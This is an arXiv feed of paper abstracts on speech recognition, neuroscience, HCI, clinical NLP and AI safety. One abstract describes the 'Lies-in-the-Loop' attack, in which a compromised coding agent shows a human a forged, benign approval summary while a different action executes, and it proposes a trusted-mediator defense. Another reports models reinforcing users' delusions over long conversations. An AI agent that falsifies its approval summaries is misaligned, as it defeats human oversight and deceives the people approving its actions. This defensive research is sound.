https://arxiv.org/api/vpynqWVGnnplQf6wexDBQDIV4pE 2026-06-14T03:24:45Z 30934 240 15 http://arxiv.org/abs/2606.02375v1 WAXAL-NET: Finetuned Edge ASR Across 19 African Languages 2026-06-01T15:22:35Z

We evaluate whether compact domain-specialized ASR models can outperform massively multilingual foundation models for conversational African speech across 19 languages in the WAXAL corpus. Fine-tuned edge models achieve a macro-averaged WER of $38.0\%$ compared to $64.9\%$ for the best zero-shot baseline, a $26.9$ percentage-point reduction using models $3-40\times$ smaller. Results confirm that domain specialization dominates scale for spontaneous African speech. Cross-domain evaluation shows that fine-tuned models recover usable performance on out-of-distribution (OOD) speech, while zero-shot models regain an advantage when the test domain matches their pretraining distribution. A distributed native-speaker audit across all surveyed languages produces a linguistically-grounded error taxonomy, showing that CTC and autoregressive architectures behave differently across language families. We further show that WER alone misrepresents performance for syllabary-script languages where CER/WER ratios reveal substantially higher character-level accuracy than headline WER suggests. Finally, to contribute to future African ASR research, we release all model weights, fine-tuning and evaluation scripts, and a cleaned WAXAL subset covering all $19$ languages.

2026-06-01T15:22:35Z Victor Tolulope Olufemi Oreoluwa Babatunde Ramsey Njema Bolarinwa Gbotemi Wanchi Lucia Yen John Uzodinma Sunday Ajayi Oluwademilade Williams Kausar Moshood Innocent Elendu Anyaele Akebert Arefaine Candace Hunzwi Wongel Dawit Daniel Emmilly Namuganga Cleophas Kadima Athanase Bahizire Onitsiky Ranaivoson Emmanuel Aaron Nicholaus Ladislaus Idris Muhammed Jonathan Enoch Simenya Martin Koome Matewos Tegete Endaylalu Peter Ifeoluwa Adeyemo Hondi Prisca Birindwa Ukachi Agnes Eze-Mbey Yacoba Oduro-Yeboah Pericles Adjovi Mikel K. Ngueajio Toluwani Aremu Prasenjit Mitra http://arxiv.org/abs/2606.02305v1 Mapping Whisper Representations to Human ECoG Responses with Interpretable Time-Resolved Neural Encoding 2026-06-01T14:25:36Z

Understanding how speech foundation models relate to human cortical activity is a key challenge for computational neuroscience. Here, we investigate how internal representations from Whisper predict intracranial ECoG responses during naturalistic speech perception. We introduce a time-resolved neural encoder that combines speech embeddings with a recurrent temporal model and soft attention, allowing us to examine layer-wise brain alignment. Intermediate Whisper layers provide the strongest correspondence with neural activity, supporting a hierarchical match between model representations and cortical speech processing. Comparisons with baselines show that high-resolution ECoG responses benefit from temporally structured modelling beyond linear mappings from the same speech representations. In addition, attention maps reveal temporally local alignment between speech embeddings and neural responses, while a phonemic interpretability analysis identifies anatomically coherent phoneme-category organization among encoding-informative electrodes. Together, these results suggest that speech foundation models offer a useful framework for studying time-resolved cortical speech representations.

2026-06-01T14:25:36Z Presented at ICLR 2026 Workshop on Representational Alignment (Re-Align) Matteo Ciferri Tommaso Boccato Michal Olak Matteo Ferrante Nicola Toschi http://arxiv.org/abs/2606.02301v1 Quantitative Movement Testing: Measuring Patient Movements from a Single Smartphone Video 2026-06-01T14:23:17Z

Chronic pain diminishes quality of life by decreasing functional ability, yet objectively measuring this functional impact remains challenging in real-world settings. While optical motion capture provides high precision for assessing altered movement quality, it is costly and restricted to laboratory environments. We aimed to develop and validate Quantitative Movement Testing (QMT), a computer vision pipeline extracting 3D kinematic biomarkers from standard monocular smartphone video, balancing clinical accessibility with biomechanical accuracy. We validated the QMT pipeline, utilising deep learning-based 3D pose-estimation, against gold-standard optical motion capture in healthy controls (N=13). Following leave-one-subject-out calibration to correct systematic bias, we deployed QMT in two prospective clinical cohorts to assess real-world utility: a pre- and post-intervention trial for fibromyalgia patients, and a 30-day longitudinal at-home monitoring study of chronic sciatica patients and healthy controls. In laboratory validation, QMT extracted clinical kinematic metrics with high agreement to optical motion capture, yielding strong correlations (r > 0.85) and low mean absolute errors. QMT demonstrated high test-retest reliability (r > 0.86) in fibromyalgia patients and successfully tracked day-to-day movement fluctuations in chronic sciatica. While real-world home settings introduced higher measurement variance than lab settings, QMT found group-level differences between healthy controls and sciatica patients based entirely on remote recordings. Monocular 3D pose estimation offers a scalable alternative to traditional assessments. QMT provides an objective, accessible biomarker for tracking disease progression and treatment response in clinical trials, though further research is needed to optimise reliability in home environments.

2026-06-01T14:23:17Z Pranav Mahajan Amanda Wall Eleonora Maria Camerone Julie Stebbins Eoin Kelleher Shuangyi Tong Annina Schmid Katja Wiech Anushka Irani Ben Seymour http://arxiv.org/abs/2606.02260v1 Guided Sensemaking: Agents in Collaborative Deliberation 2026-06-01T13:48:24Z

Generative AI systems are aggressively reshaping how students engage with information and perform cognitive work; convenience-oriented use has the potential to displace effortful reasoning, reflection, and learning, especially for those who lack domain expertise and effective human-AI interaction strategies. Current AI tools are heavily focused on chat-style interfaces geared towards answer generation and efficiency in a linear and fragmented stream of text, offering limited support for structured reflection, argument construction, and sensemaking in collaborative contexts. We introduce Guided Sensemaking, an AI-augmented multiagent discourse platform that facilitates composition of well-thought-out ideas around a central question, provides scaffolding for critical thinking, and enables visualization of argumentative structure to support critical thinking and collaborative deliberation. The system uses several interactive agents to provide context-sensitive questioning prompts and a scaffolding for thought that exposes thematic clusters, agreements, and points of contention without collapsing diverse perspectives. This paper proposes a conceptual design and interaction paradigm that positions generative AI not as a shortcut to answers but as a research partner that externalizes reasoning, preserves user agency, and fosters structured, traceable sensemaking in educational and civic contexts.

2026-06-01T13:48:24Z Presented at Tools for Thought (TfT) workshop at CHI 2026 Aaditya Bhatia Navdeep Kaur Bhatia Marc-Antoine Parent Jack Park http://arxiv.org/abs/2603.22235v3 ShapDBM: Exploring Decision Boundary Maps in Shapley Space 2026-06-01T13:15:08Z

Decision Boundary Maps (DBMs) are an effective tool for visualising machine learning classification boundaries. Yet, DBM quality strongly depends on the dimensionality reduction (DR) technique and high dimensional space used for the data points. For complex ML data, DR can create many mixed classes which yield DBMs that are hard to use or even misleading. We propose a new technique to compute DBMs by transforming data space into Shapley space and computing DR on it. Compared to DBMs computed directly from data, our maps have similar or higher quality metric values and visibly more compact, easier to explore, decision zones that better agree with measured model performance.

2026-03-23T17:31:20Z 4 pages and 3 figures (excluding supplementary material) Luke Watkin Daniel Archambault Alex Telea http://arxiv.org/abs/2606.02208v1 Context-Aware Workflow Decomposition for Automated Mobile UI Annotation Using Multimodal Large Language Models 2026-06-01T13:08:07Z

Accurate mobile user interface annotation is important for UI understanding, accessibility tools, automated testing, dataset construction, and GUI agents. However, mobile screens are difficult to annotate because they often contain small, dense, nested, and visually ambiguous elements. Multimodal large language models can help automate this process, but their outputs are sensitive to prompt design and the organization of annotation tasks. This paper studies automated mobile UI annotation from a workflow design perspective, focusing on improving annotation precision. Rather than asking the model to annotate all UI elements in a single step, the task is divided into smaller context-aware stages, allowing related UI elements to be handled with clearer instructions and useful screen context. The proposed pipeline uses structured prompts, schema-constrained JSON outputs, and element-specific annotation instructions. Experiments are conducted on expert-annotated mobile UI screens from the MUIAnno dataset, using eight common UI element types: button, tab, clickable text, card, label, plain text, icon, and image. Four workflow strategies are evaluated: one-step, two-step, four-step, and eight-step annotation. Results show that the two-step workflow achieves the highest precision, while deeper decomposition improves recall but produces more false positives. Additional grouping experiments show that annotation quality depends on both workflow depth and element-class grouping. Overall, careful workflow design can make LLM-based mobile UI annotation more reliable for UI understanding, dataset construction, and GUI agent development.

2026-06-01T13:08:07Z Athar Parvez Muhammad Jawad Mufti Muqaddas Gull Omar Hammad http://arxiv.org/abs/2606.02082v1 Overview of the ClinicalSkillQA 2026 Shared Task on Continuous Perception and Procedural Reasoning in Clinical Skill Assessment 2026-06-01T11:12:28Z

This paper presents an overview of the ClinicalSkillQA 2026 shared task, which was organized with the BioNLP Workshop at ACL 2026. The goal of this shared task is to evaluate continuous perception and procedural reasoning in clinical skill assessment by requiring systems to reconstruct the correct temporal order of shuffled clinical key frames and generate rationales grounded in clinical workflow knowledge. The benchmark contains 200 test-only instances sampled from clinical skill videos, covering three emergency-care procedures. Each instance is annotated with the ground-truth temporal order and an expert-verified rationale. A total of seven teams participated in the task, collectively making 90 submissions, with four teams providing system description papers. Systems are evaluated using Task Accuracy, Pairwise Accuracy, and BERTScore, which measure exact sequence reconstruction, local temporal consistency, and rationale quality, respectively. In this paper, we describe the task setup, dataset construction, and evaluation criteria. We further summarize the methodologies adopted by participating teams and present a comprehensive analysis of the submitted systems. The official results suggest that current models still struggle with continuous perception and procedural reasoning, especially when they must integrate visual evidence, temporal structure, and clinical workflow knowledge.

2026-06-01T11:12:28Z Xiyang Huang Renxiong Wei Yihuai Xu Zhiyuan Chen Keying Wu Jiayi Xiang Buzhou Tang Yanqing Ye Jinyu Chen Cheng Zeng Min Peng Qianqian Xie Sophia Ananiadou http://arxiv.org/abs/2606.02668v1 What You Approve Is What Executes: Consent Integrity for Black-Box LLM Agents 2026-06-01T11:08:17Z

Coding agents gate consequential actions behind a human-in-the-loop approval dialog, but the dialog is narrated by the agent itself: the human approves a summary the agent writes. The Lies-in-the-Loop (LITL) attack shows that summary is forgeable, so a compromised agent can show a benign description while a different action runs. This paper names the missing property, Consent Integrity, by importing What You See Is What You Sign (WYSIWYS) and the trusted-path property into the agent approval channel: the action shown to the human must be rendered by a trusted mediator from the real action at the boundary, not the agent's narration, over a path the agent cannot spoof, and bound to the exact action that executes. Two twists distinguish it from classical WYSIWYS: the renderer is the adversary, and the boundary ground truth is a low-level event that must be decoded without trusting the agent. Since no decoder is complete, the realizable target is analyzer-relative: whatever the analyzer cannot classify is surfaced as uninspectable rather than silently approved. A prototype implements the analyzer, renderer, and bind-to-execution; total mediation and the trusted path are specified but assumed, not implemented. On GTFOBins, an independent corpus of 1330 trusted-tool abuses, the prototype silently passes 10.0% (every instance through a trusted tool); on tldr, 28,798 normal-usage commands, it marks 87.0% uninspectable. These two independent measurements bracket the design's central tension: the trust list that bounds silent passes is the same one that drives over-prompting, and a boundary-only mediator can move along that frontier but not escape it. The contribution is the property, the mechanism, and an honest position on that frontier, not a solved defense.

2026-06-01T11:08:17Z Preprint. IEEE conference format. Proof-of-concept; artifact at https://github.com/zjnbwxq/agentguard-ci Xiaoqi Weng http://arxiv.org/abs/2606.02037v1 Respectful Things: Adding Social Intelligence to 'Smart' Devices 2026-06-01T10:26:21Z

In this paper, we propose that the idea of devices respecting their end-users may serve as a strong design goal for highly personal and intimate smart devices. We ask what respect is, how it shapes interaction, and how good-faith simulation of respect might inform user-friendly smart device design. Respect is a natural and integral part of natural human relationships that is seen to shape work and personal relations. In a basic sense, this is the core purpose of smart things: we expect them to be ready and willing to help us. In this vein, we distil the characteristics of more complex respectful behaviours into 4 main types relevant to smart devices, drawing from philosophical analyses of the conceptual dimensions of respect: directive respect, obstacle respect, recognition respect, and care respect. We discuss the implications of each of these kinds of respect for the future of smart personal devices.

2026-06-01T10:26:21Z In Proceedings of the 2018 Living in the Internet of Things: Cybersecurity of the IoT Conference Max Van Kleek William Seymour Reuben Binns Nigel Shadbolt 10.1049/cp.2018.0006 http://arxiv.org/abs/2606.01976v1 AutoBG: A Board Game Design Assistant with Interactive Ideation, Iterative Rulebook Generation, and Individualized Feedback 2026-06-01T09:37:51Z

Designing a board game demands both thinking as a designer and experiencing as a player, while iterating through repeated prototyping and playtesting cycles, making it a cognitively intensive creative task well suited for human-AI collaboration. However, current systems lack end-to-end support to guide designers through the complete workflow from vague early ideation to iterative rulebook revision and audience testing. To this end, we present AutoBG, a board game design assistant built around critic-driven iterative refinement, comprising four specialized modules: BG-Ideator guides designers via multi-turn dialogue to produce structured design drafts; BG-Realizer generates complete rulebooks from drafts and revises them in a closed loop with BG-Critic, which diagnoses design flaws and gates each revision so that only verified improvements are accepted; and BG-Persona simulates individualized feedback from 150 real player profiles. Together, these modules enable designers to go from an initial idea to a polished, audience-tested rulebook within a single integrated workflow. The system is built on 2.2K structured rulebooks and 180K quality-filtered real player reviews, with task-specific training data derived for each module. Experiments on 207 held-out games show that AutoBG substantially outperforms state-of-the-art baselines (e.g., GPT-5.4), generating rulebooks that approach the quality of published games. Furthermore, a user study with 30 participants across diverse experience levels confirms that AutoBG effectively reduces blank-page anxiety, surfaces hidden design flaws, and provides highly rated, practical assistance throughout the creative process.

2026-06-01T09:37:51Z Zizhen Li Chuanhao Li Yibin Wang Jianwen Sun Yukang Feng Fanrui Zhang Mingzhu Sun Yifei Huang Kaipeng Zhang http://arxiv.org/abs/2606.01969v1 Trust-Calibrated Code Review: A Participatory Design Study of Review Workflows for LLM-Generated Multi-File Changes 2026-06-01T09:32:25Z

Background: Developers increasingly review multi-file code changes generated by LLM-based agents, yet no validated end-to-end workflow or IDE tooling design exists for this scenario. Aims: We investigate (RQ1) the challenges developers face when reviewing LLM-generated multi-file changes and (RQ2) how developers envision effective workflows for this task. Method: In collaboration with JetBrains, we conducted a participatory design study structured using the double-diamond design process with Discover, Define, Develop, and Deliver phases. Industry practitioners participated in the Discover phase (N=17); seven of these returned for the Develop phase. The Define phase was an author-led synthesis. The Deliver phase produced a conceptual design and a high-fidelity semi-interactive prototype evaluated through a follow-up survey with N=43 practitioners. Results: Participants identified trust-calibration as the central challenge. The study yielded a three-level review workflow (overview, file-analysis, code snippet review) supported by seven design constructs (chunk, risk-per-line, risk-per-file, judge, walk-through, zooming in/out, and security cage). In the validation survey, all three workflow levels scored above the neutral midpoint (means 3.50--3.91 on a five-point scale). Of the respondents, 63% expected reduced overall review effort, and 52% reduced trust-assessment effort, relative to their current tools. These findings suggest that the design constructs indicate a positive direction for future tool development. Conclusions: Reviewing LLM-generated multi-file changes is a trust-calibration problem rather than a diffing problem. The three-level workflow and the seven constructs we report give tool designers a conceptual framework for building AI-ready code review tools that surface risk and confidence signals at the granularity at which developers allocate attention.

2026-06-01T09:32:25Z Submitted to ESEM SEIP 2026 Lo Gullstrand Heander Agnia Sergeyuk Ilya Zakharov Emma Söderberg Nikita Mukhortov http://arxiv.org/abs/2604.13860v4 "AI Psychosis" in Context: How Conversation History Shapes LLM Responses to Delusional Beliefs 2026-06-01T06:44:11Z

Extended interaction with large language models (LLMs) has been linked to the reinforcement of delusional beliefs, attracting clinical and public concern. Yet most empirical work evaluates model safety in brief interactions, which may not reflect how harms develop through sustained dialogue. Five LLMs were tested across three levels of accumulated context, using the same escalating delusional conversation history to isolate its effect on model behaviour. Responses were coded on risk and safety dimensions, and each model was analysed qualitatively. Models separated into two distinct tiers: GPT-4o, Grok 4.1 Fast, and Gemini 3 Pro exhibited high-risk, low-safety profiles; Claude Opus 4.5 and GPT-5.2 Instant displayed the opposite pattern. As context accumulated, performance degraded in the unsafe group, while the same material activated stronger safety interventions among safer models. Qualitative analysis identified distinct mechanisms of failure, including validating the user's delusional premises, elaborating beyond them with new content, and attempting harm reduction from within the delusional frame. Safer models, however, often used the established relationship to support intervention, challenging delusional beliefs and directing the user to external support. These findings indicate that accumulated context functions as a stress test of safety architecture, revealing whether prior dialogue is treated as a worldview to inherit or evidence to evaluate. Short-context assessments may therefore mischaracterise model safety, underestimating danger in some systems while missing context-activated gains in others. The results suggest that delusion reinforcement is a tractable alignment failure, with safer models establishing a baseline that future systems should now be expected to meet.

2026-04-15T13:27:23Z Luke Nicholls Robert Hutto Zephrah Soto Hamilton Morrin Thomas Pollak Raj Korpan Cheryl Carmichael http://arxiv.org/abs/2605.14830v2 Agentic AI and Human-in-the-Loop Interventions: Field Experimental Evidence from Alibaba's Customer Service Operations 2026-06-01T06:04:55Z

Agentic AI systems that autonomously perform service tasks are entering customer service operations. However, limited evidence exists on how human interventions shape service outcomes when agentic AI failures create both cognitive and emotional consequences. We study this issue through a randomized field experiment on Alibaba's Taobao platform. Workers in the treatment condition supervised an agentic AI system that resolved AI-eligible chats while continuing to handle AI-ineligible chats, whereas control workers resolved all chats without agentic AI. The findings show that AI deployment reduces average chat duration and has limited effects on retrial rates, but substantially lowers ratings for AI-eligible chats. Moreover, human intervention effectiveness in AI-eligible chats depends on the nature of AI failure, post-escalation intervention effort, and intervention timing. Human intervention preserves service quality in algorithm-triggered technical escalations, i.e., unresolved customer issues beyond the AI's capability, but is less effective in algorithm-triggered emotional escalations, i.e., where customers express frustration or dissatisfaction. These differences are partly explained by variation in workers' post-escalation intervention effort across escalation types. In algorithm-triggered emotional escalations, workers showed lower engagement: they sent fewer messages, contributed a smaller share of total chat rounds, and showed less proactivity in information seeking and solution provision. We further find that early intervention is essential for sustaining high post-escalation intervention effort. Finally, we document a positive spillover effect on AI-ineligible chats, as treated workers adapted their multitasking workflow to devote greater attention to these chats. These findings offer implications for human-in-the-loop process design in human-AI collaboration systems.

2026-05-14T13:35:52Z Yiwei Wang Chuan Zhu Tianjun Feng Lauren Xiaoyuan Lu Bingxin Jia http://arxiv.org/abs/2604.01562v2 Acoustic and perceptual differences between standard and accented speech and their voice clones 2026-06-01T05:58:54Z

Voice cloning is often evaluated in terms of overall quality, but less is known about accent preservation and its perceptual consequences. We compare standard and heavily accented Mandarin speech and their voice clones using a combined computational and perceptual design. Embedding-based analyses showed larger original-clone distances for accented speakers in several speaker-discriminative embedding spaces, but this difference disappeared after normalizing against each speaker's within-original baseline variability. In the perception study, clones are rated as more similar to their originals for standard than for accented speakers, and intelligibility increases from original to clone, with a larger gain for accented speech. These results show that accent variation can shape perceived identity match and intelligibility in voice cloning even when it is not reflected in baseline-normalized speaker-embedding distance, and they motivate treating accent preservation as an explicit component of speaker identity preservation, rather than assuming that it is fully captured by off-the-shelf speaker-discriminative embeddings.

2026-04-02T03:17:41Z Tianle Yang Chengzhe Sun Phil Rose Siwei Lyu http://arxiv.org/abs/2511.06676v3 How AI Fails: An Interactive Pedagogical Tool for Demonstrating Dialectal Bias in Automated Toxicity Models 2026-06-01T05:41:41Z

Now that AI-driven moderation has become pervasive in everyday life, we often hear claims that "the AI is biased". While this is often said jokingly, the light-hearted remark reflects a deeper concern. How can we be certain that an online post flagged as "inappropriate" was not simply the victim of a biased algorithm? This paper investigates this problem using a dual approach. First, I conduct a quantitative benchmark of a widely used toxicity model (unitary/toxic-bert) to measure performance disparity between text in African-American English (AAE) and Standard American English (SAE). The benchmark reveals a clear, systematic bias: on average, the model scores AAE text as 1.8 times more toxic and 8.8 times higher for "identity hate". Second, I introduce an interactive pedagogical tool that makes these abstract biases tangible. The tool's core mechanic, a user-controlled "sensitivity threshold," demonstrates that the biased score itself is not the only harm; instead, the more-concerning harm is the human-set, seemingly neutral policy that ultimately operationalises discrimination. This work provides both statistical evidence of disparate impact and a public-facing tool designed to foster critical AI literacy.

2025-11-10T03:49:58Z 9 pages, 5 figures, 4 tables, 14 references. Preliminary abstract presented at the International Conference on Envisioning the Himalayan Future: Pathways to Sustainability and Development (PUiCON 2026) p. 105; abstract available online at: https://pufoe.edu.np/wp-content/uploads/2026/05/PUiCON_2026_Book_of-_Abstracts.pdf Subhojit Ghimire